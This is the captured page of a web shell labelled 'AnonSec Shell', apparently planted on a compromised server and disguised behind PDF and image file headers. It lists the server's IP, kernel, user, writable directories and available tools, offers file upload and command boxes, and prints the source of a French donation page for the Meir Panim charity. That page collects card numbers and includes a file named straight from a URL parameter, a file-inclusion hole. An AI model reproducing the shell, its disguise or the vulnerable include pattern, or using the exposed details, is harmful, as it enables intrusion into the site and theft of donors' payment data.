%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/www/donation_fOld.php
<?php 
//include('inc/ssl_only.php');  //ssl_only.php //no_ssl.php
require_once('Connections/french.php'); 
/*
if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

mysql_select_db($database_main, $main);
$query_POST = "SELECT id, Country_f, Title_f, Address_f FROM offices WHERE Country_f NOT LIKE '%COAST%' ";
$POST = mysql_query($query_POST, $main) or die(mysql_error());
$row_POST = mysql_fetch_assoc($POST);
$totalRows_POST = mysql_num_rows($POST);

mysql_select_db($database_main, $main);
$query_phone = "SELECT id, Country_f, Phone_f, Toll_free, Mobile FROM offices WHERE Country_f NOT LIKE '%COAST%'";
$phone = mysql_query($query_phone, $main) or die(mysql_error());
$row_phone = mysql_fetch_assoc($phone);
$totalRows_phone = mysql_num_rows($phone);

mysql_select_db($database_main, $main);
$query_fax = "SELECT id, Country_f, Fax FROM offices WHERE Fax != '' AND Country_f NOT LIKE '%COAST%'";
$fax = mysql_query($query_fax, $main) or die(mysql_error());
$row_fax = mysql_fetch_assoc($fax);
$totalRows_fax = mysql_num_rows($fax);

mysql_select_db($database_main, $main);
$query_bank = "SELECT id, Country_f, bank FROM offices WHERE bank != ''";
$bank = mysql_query($query_bank, $main) or die(mysql_error());
$row_bank = mysql_fetch_assoc($bank);
$totalRows_bank = mysql_num_rows($bank);

mysql_select_db($database_main, $main);
$query_tax = "SELECT id, Country_f, tax_id FROM offices WHERE tax_id != ''";
$tax = mysql_query($query_tax, $main) or die(mysql_error());
$row_tax = mysql_fetch_assoc($tax);
$totalRows_tax = mysql_num_rows($tax);
?>
<? 
$MPreffers = $_COOKIE['MPreffers'];
session_start(); 
$_SESSION['makor_mpde'] = good; // store session data
*/
 ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Votre don securise pour Meir Panim</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="Meir, Panim, soup, kitchens, Israel">
<meta name="description" content="Your SECURE Contribution Form to Meir Panim">
<style type="text/css">
<!--
.test {
	font-family: Georgia, "Times New Roman", Times, serif;
	font-size: 3px;
	color: #FFFFFF;
}
.textcenter {font-family: Arial, Helvetica, sans-serif; font-size: 10pt; font-weight: normal; color: #336699; text-align: center}
.text1 {font-family: Arial, Helvetica, sans-serif; font-size: 11pt; font-weight: normal; color: #336699}
.textboldC {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11pt; color: #336699}
.frame {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11pt; font-weight: normal; color: #336699; border: #336699; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; background-color: #FFFFFF}
.textRed {font-family: Arial, Helvetica, sans-serif; font-size: 10pt; font-weight: normal; color: #FF0000}
.textsmall {font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: normal; color: #336699}
.style2 {font-size: 13px; font-family: Arial, Helvetica, sans-serif;}
.style4 {font-weight: bold}
.style5 {font-family: Arial, Helvetica, sans-serif; font-size: 10pt; font-weight: bold; color: #FF0000; }
-->
</style>
<?php //require_once('inc/js_load_menu_top_f.php'); ?>
<script language="JavaScript">
<!--

function PopupPic(sPicURL) { 
     window.open( "popup_e.htm?"+sPicURL, "",  
     "scrollbars=yes,resizable=1,HEIGHT=480,WIDTH=640"); 
   }
//-->
</script>
<script type="text/javascript">
var state = 'none';

function showhide(layer_ref) {

if (state == '') {
state = 'none';
document.validation.act.value='Open - Send Honor/Memory message to:';
}
else {
state = '';
document.validation.act.value='Close - Send Honor/Memory message to:';
}
if (document.all) { //IS IE 4 or 5 (or 6 beta)
eval( "document.all." + layer_ref + ".style.display = state");
}
if (document.layers) { //IS NETSCAPE 4 or below
document.layers[layer_ref].display = state;
}
if (document.getElementById && !document.all) {
maxwell_smart = document.getElementById(layer_ref);
maxwell_smart.style.display = state;
}
}
</script>
<SCRIPT ID=clientEventHandlersJS LANGUAGE=javascript>
<!--
function Form_Validator(theForm)
{


  if ((theForm.Name.value == "") || (theForm.Name.value.length > 30))
  {
    alert("SVP Inscrivez votre nom");
    theForm.Name.focus();
    return (false);
  }
  if (theForm.email.value != "") 
 {
var testresults
var str=theForm.email.value
var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i
if (filter.test(str))
testresults=true
else{
alert("SVP inscrivez votre adresse mail")
      theForm.email.focus()
    return (false);
  }

}
  
	if (theForm.Payment_method.selectedIndex < 1)
	{
	  alert('SVP selectionner la carte de paiement de votre choix')
      theForm.Payment_method.focus()
	  return (false);
   }

  if ((theForm.Card_Number.value == "") || (theForm.Card_Number.value.length < 15))
  {
    alert("SVP saisissez votre numero de carte bancaire");
    theForm.Card_Number.focus();
    return (false);
  }
//
/*if (theForm.Card_Security_Code.value.length < 3)
  {
    alert("SVP Inscrivez votre code de s?curit?");
    theForm.Card_Security_Code.focus();
    return (false);
  }
  */ 
   	if (theForm.expmonth.selectedIndex < 1)
	{
	  alert('SVP Inscrivez votre mois d’expiration')
      theForm.expmonth.focus()
	  return (false);
   }
   
	if (theForm.expyear.selectedIndex < 1)
	{
	  alert('SVP Inscrivez votre annee d’expiration')
      theForm.expyear.focus()
	  return (false);
   }

  if ((theForm.Total.value == "") || (theForm.Total.value < 0.5))
  {
    alert("SVP inscrivez le montant total de votre don");
    theForm.Total.focus();
    return (false);
  }

   if (theForm.total2.value > theForm.Total.value)
  {
    alert("Le montant total du don ne peut pas etre inferieur au total du montant des differents paiements");
    theForm.Total.focus();
    return (false);
  }

   return (true);

}


function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}

function calcTotal() {
	var x;
	x=document.getElementById("payment").value.replace(/[^0-9]/g,"");
	var total = x*document.getElementById("months").value;
	document.getElementById("totalpay").value = total;
	
		var y;
	y=x;
	var total2 = y*document.getElementById("months").value;
	document.getElementById("totalpay2").value = total2;
    return;
}

function MM_popupMsg(msg) { //v1.0
  alert(msg);
}
//-->
</script>
<script language="JavaScript" type="text/javascript">
//here you place the ids of every element you want.
var ids=new Array('a1','a2','a3','a4');

function switchid(id){	
	hideallids();
	showdiv(id);
}

function hideallids(){
	//loop through the array and hide each element by id
	for (var i=0;i<ids.length;i++){
		hidediv(ids[i]);
	}		  
}

function hidediv(id) {
	//safe function to hide an element with a specified id
	if (document.getElementById) { // DOM3 = IE5, NS6
		document.getElementById(id).style.display = 'none';
	}
	else {
		if (document.layers) { // Netscape 4
			document.id.display = 'none';
		}
		else { // IE 4
			document.all.id.style.display = 'none';
		}
	}
}

function showdiv(id) {
	//safe function to show an element with a specified id
		  
	if (document.getElementById) { // DOM3 = IE5, NS6
		document.getElementById(id).style.display = 'block';
	}
	else {
		if (document.layers) { // Netscape 4
			document.id.display = 'block';
		}
		else { // IE 4
			document.all.id.style.display = 'block';
		}
	}
}
</script>
<script language="JavaScript">
//if (top.location != location) {top.location.href = window.location.href} //  site always complete window
</script>
</head>

<body bgcolor="" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="10">
  <tr>
    <td valign="top"><table border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td width="100%" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td valign="top"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
              <tr>
                <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <tr>
                      <td width="26" valign="top"><div align="left"><img src="images/icons/ssl.gif" width="24" height="24" /></div></td>
                      <td valign="top"><span class="headerblue"><strong>Votre don aux Amis de Meir Panim est securis&eacute;</strong></span> </td>
                    </tr>
                </table></td>
              </tr>              
              <tr height="20">
                <td valign="top" class="text"  height="20">
<?php if ( $_GET['occasion'] != "" )
						  {  
						  $file = "inc/occasion_".$_GET['occasion']."_f.php" ;
						  echo "<br>";
						 include($file); 
						  }
						   ?>				</td>
              </tr>
             
              <tr>
                <td valign="top" class="text">
			<?php require_once('f/form_inc_yoni.php'); ?>	
					</td>
              </tr>
              <tr>
                <td valign="top" class="text"><div style="width:430px; background:#f3f3f3; border:1px solid #c9c9c9; padding:20px; margin:auto;"><?php require_once('inc/bottom1_f.php'); ?></div></td>
              </tr>
            </table></td>
          </tr>
        </table></td>
          </tr>
        </table>
                           <div  id='a3'  style="display:none;"  > <table width="250" border="0" cellspacing="0" cellpadding="0">
                <tr>
                  <td></td>
                </tr>
                <tr>
                  <td background="images/line_250_bg.gif"><table width="230" border="0" align="center" cellpadding="0" cellspacing="0">
                    <tr>
                      <td class="headerNewsHP"><table width="230" border="0" align="center" cellpadding="0" cellspacing="0">
                        <tr>
                          <td width="26" valign="top"></td>
                              <td valign="top"><span class="headerblue"><strong>DONATE VIA POST</strong></span> </td>
                            </tr>
                      </table></td>
                      </tr>
                    <?php do { ?>
                      <tr>
                        <td class="headerNewsHP"><div align="center"><strong><?php echo $row_POST['Country_f']; ?>:<br>
                          </strong><?php echo $row_POST['Title_f']; ?> <?php echo $row_POST['Address_f']; ?> 
                           <br>
                          <br class="spacer10">
                        </div></td>
                      </tr>
                      <?php } while ($row_POST = mysql_fetch_assoc($POST)); ?>
                  </table></td>
                </tr>
                <tr>
                  <td></td>
                </tr>
            </table></div>
                      <div  id='a2'  style="display:none;"  >
              <table width="250" border="0" cellspacing="0" cellpadding="0">
                  <tr>
                    <td></td>
                  </tr>
            <tr>
              <td background="images/line_250_bg.gif"><table width="230" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td colspan="2" class="headerNewsHP"><table width="230" border="0" align="center" cellpadding="0" cellspacing="0">
                      <tr>
                        <td width="26" valign="top"><div align="left"><img src="images/icons/fax.gif" width="24" height="24" style="margin-right:8px;"></div></td>
                            <td valign="top"><span class="headerblue"><strong>DONATE VIA FAX</strong></span> </td>
                          </tr>
                    </table></td>
                    </tr>
                  <?php do { ?>
                    <tr>
                      <td valign="top" class="headerNewsHP"><div align="left"><strong class="headergreen">&nbsp;&#8226;</strong><br class="spacer10">
                            </div></td>
                      <td class="headerNewsHP"><strong><?php echo $row_fax['Country_f']; ?>: </strong><br>
<?php echo $row_fax['Fax']; ?><br class="spacer10"></td>
                    </tr>
                    <?php } while ($row_fax = mysql_fetch_assoc($fax)); ?>
</table></td>
            </tr>
            <tr>
              <td></td>
            </tr>
          </table></div>
                  <div  id='a4'  style="display:none;"  > <table width="250" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td></td>
            </tr>
            <tr>
              <td background="images/line_250_bg.gif"><table width="230" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td class="headerNewsHP"><table width="230" border="0" align="center" cellpadding="0" cellspacing="0">
                      <tr>
                        <td width="26" valign="top"><div align="left"><img src="images/icons/bank.gif" width="24" height="24" style="margin-right:8px;"></div></td>
                            <td valign="top"><span class="headerblue"><strong>DONATE DIRECTLY TO THE BANK ACCOUNT
                              
  </strong></span> </td>
                          </tr>
                    </table></td>
                    </tr>
                  <?php do { ?>
                    <tr>
                      <td class="headerNewsHP"><div align="center"><strong><?php echo $row_bank['Country_f']; ?>: </strong><br>
                              <?php echo $row_bank['bank']; ?><br>
                        <br class="spacer10">
                      </div></td>
                    </tr>
                    <?php } while ($row_bank = mysql_fetch_assoc($bank)); ?>
              </table></td>
            </tr>
            <tr>
              <td></td>
            </tr>
          </table> </div>
         </td>
      </tr>
    </table></td>
  </tr>
</table>
</body>
</html>
<?php/*
mysql_free_result($POST);

mysql_free_result($phone);

mysql_free_result($fax);

mysql_free_result($bank);

mysql_free_result($tax);
*/
?>

Anon7 - 2022
AnonSec Team